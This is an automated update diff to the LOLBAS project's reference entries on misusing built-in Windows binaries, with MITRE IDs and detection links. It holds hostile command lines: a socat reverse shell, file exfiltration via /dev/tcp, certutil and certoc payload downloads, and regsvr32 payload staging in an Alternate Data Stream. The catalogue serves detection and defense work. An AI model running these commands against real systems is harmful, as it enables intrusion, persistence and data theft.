Applying update LOLBAS-Project/LOLBAS@a79893e

Author: github-actions[bot]

_lolbas/Binaries/AppInstaller.md

@@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
 Created: 2020-12-02
 Commands:
-  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
+  - Command: start ms-appinstaller://?source={REMOTEURL:.exe}
     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
     Usecase: Download file from Internet
     Category: Download

_lolbas/Binaries/At.md

@@ -4,7 +4,7 @@ Description: Schedule periodic tasks
 Author: 'Freddie Barr-Smith'
 Created: 2019-09-20
 Commands:
-  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
+  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
     Description: Create a recurring task to execute every day at a specific time.
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute

_lolbas/Binaries/Atbroker.md

@@ -1,7 +1,7 @@
 ---
 Name: Atbroker.exe
 Description: Helper binary for Assistive Technology (AT)
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: ATBroker.exe /start malware

_lolbas/Binaries/Bash.md

@@ -1,11 +1,11 @@
 ---
 Name: Bash.exe
 Description: File used by Windows subsystem for Linux
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: bash.exe -c calc.exe
-    Description: Executes calc.exe from bash.exe
+  - Command: bash.exe -c "{CMD}"
+    Description: Executes executable from bash.exe
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
@@ -14,15 +14,15 @@ Commands:
     Tags:
       - Execute: CMD
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
-    Description: Executes a reverseshell
+    Description: Executes a reverse shell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
     Tags:
       - Execute: CMD
-  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
+  - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
@@ -31,8 +31,8 @@ Commands:
     OperatingSystem: Windows 10
     Tags:
       - Execute: CMD
-  - Command: bash.exe -c calc.exe
-    Description: Executes calc.exe from bash.exe
+  - Command: bash.exe -c "{CMD}"
+    Description: Executes executable from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
@@ -43,8 +43,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe
-Code_Sample:
-  - Code:
 Detection:
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml

_lolbas/Binaries/Bitsadmin.md

@@ -1,7 +1,7 @@
 ---
 Name: Bitsadmin.exe
 Description: Used for managing background intelligent transfer
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

_lolbas/Binaries/Certoc.md

@@ -4,7 +4,7 @@ Description: Used for installing certificates
 Author: 'Ensar Samil'
 Created: 2021-10-07
 Commands:
-  - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
+  - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
     Description: Loads the target DLL file
     Usecase: Execute code within DLL file
     Category: Execute
@@ -13,7 +13,7 @@ Commands:
     OperatingSystem: Windows Server 2022
     Tags:
       - Execute: DLL
-  - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
+  - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
     Description: Downloads text formatted files
     Usecase: Download scripts, webshells etc.
     Category: Download

_lolbas/Binaries/Certreq.md

@@ -1,18 +1,18 @@
 ---
 Name: CertReq.exe
 Description: Used for requesting and managing certificates
-Author: 'David Middlehurst'
+Author: David Middlehurst
 Created: 2020-07-07
 Commands:
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
-    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
+    Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows 10, Windows 11
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
-    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
+    Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
     Usecase: Upload
     Category: Upload
     Privileges: User
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe
   - Path: C:\Windows\SysWOW64\certreq.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
   - IOC: certreq creates new files

_lolbas/Binaries/Certutil.md

@@ -1,46 +1,46 @@
 ---
 Name: Certutil.exe
 Description: Windows binary used for handling certificates
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
-    Description: Download and save 7zip to disk in the current folder.
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save executable to disk in the current folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
-    Description: Download and save 7zip to disk in the current folder.
+  - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save executable to disk in the current folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
     Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -encode inputFileName encodedOutputFileName
+  - Command: certutil -encode {PATH} {PATH:.base64}
     Description: Command to encode a file using Base64
     Usecase: Encode files to evade defensive measures
     Category: Encode
     Privileges: User
     MitreID: T1027.013
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decode encodedInputFileName decodedOutputFileName
+  - Command: certutil -decode {PATH:.base64} {PATH}
     Description: Command to decode a Base64 encoded file.
     Usecase: Decode files to evade defensive measures
     Category: Decode
     Privileges: User
     MitreID: T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
-    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+  - Command: certutil -decodehex {PATH:.hex} {PATH}
+    Description: Command to decode a hexadecimal-encoded file.
     Usecase: Decode files to evade defensive measures
     Category: Decode
     Privileges: User
@@ -49,8 +49,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certutil.exe
   - Path: C:\Windows\SysWOW64\certutil.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

_lolbas/Binaries/Cmd.md

@@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
 Author: Ye Yint Min Thu Htut
 Created: 2019-06-26
 Commands:
-  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
     Description: Add content to an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: cmd.exe - < fakefile.doc:payload.bat
+  - Command: cmd.exe - < {PATH}:payload.bat
     Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
     MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+  - Command: type {PATH_SMB} > {PATH_ABSOLUTE}
     Description: Downloads a specified file from a WebDAV server to the target file.
     Usecase: Download/copy a file from a WebDAV server
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+  - Command: type {PATH_ABSOLUTE} > {PATH_SMB}
     Description: Uploads a specified file to a WebDAV server.
     Usecase: Upload a file to a WebDAV server
     Category: Upload

_lolbas/Binaries/Cmdkey.md

@@ -1,7 +1,7 @@
 ---
 Name: Cmdkey.exe
 Description: creates, lists, and deletes stored user names and passwords or credentials.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: cmdkey /list